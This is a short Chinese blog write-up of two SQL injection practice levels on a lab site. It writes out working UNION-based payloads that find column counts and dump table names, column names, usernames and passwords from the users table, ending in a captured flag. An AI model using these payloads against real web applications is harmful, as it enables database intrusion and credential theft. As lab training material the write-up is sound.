web渗透—sql

发布于 2020-06-01  59 次阅读


链接:http://120.92.13.235

less-1

首先判断是否存在sql注入,构造id=1',发现报错,则存在注入点

接着构造Id=1’ Order by 3不报错,order by 4 报错说明有三个字段

判断哪几个为输出位

给id一个不存在的值

?id=-0' union select%20 1,2,3 --+

发现 用户名这是第二个显示位  密码位第三个显示位

直接查询数据库

?id=-1' union select%20 1,database(),3 --+

查全部数据库

爆当前数据库的表

id=-1' union select%20 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+

 

users表爆字段

?id=-1' union select%20 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+

user password字段的值

user

id=-1' union select%20 1,(select group_concat(username) from users),3 --+

password

 

得到flag

flag{bckiqwhycbenve}

less-2

构造?id=2-1

这一关与第一关没有很大的区别,只是第一关是字符型注入而less-2为数字型注入 sql语句中没有给获得的id添加 ‘’ 所以这里可以不需要给id值闭合

 

最后构造?id=-1 union select%20 1,(select group_concat(password) from users),3 --+其余和less1相似

 

 


Everything is alright